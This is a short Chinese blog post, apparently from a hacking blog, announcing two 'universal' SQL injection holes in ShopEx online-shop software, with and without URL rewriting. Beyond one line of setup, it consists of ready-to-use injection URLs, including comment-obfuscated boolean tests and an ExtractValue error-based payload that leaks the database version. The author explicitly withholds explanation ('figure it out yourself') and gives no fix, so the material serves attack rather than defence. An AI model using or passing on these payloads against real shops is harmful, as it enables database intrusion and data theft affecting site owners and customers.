shopex两处通杀注入
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
如何注入就不多说了,自己捉摸!
https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
https://www.webshell.cc/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
https://www.webshell.cc/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4223.html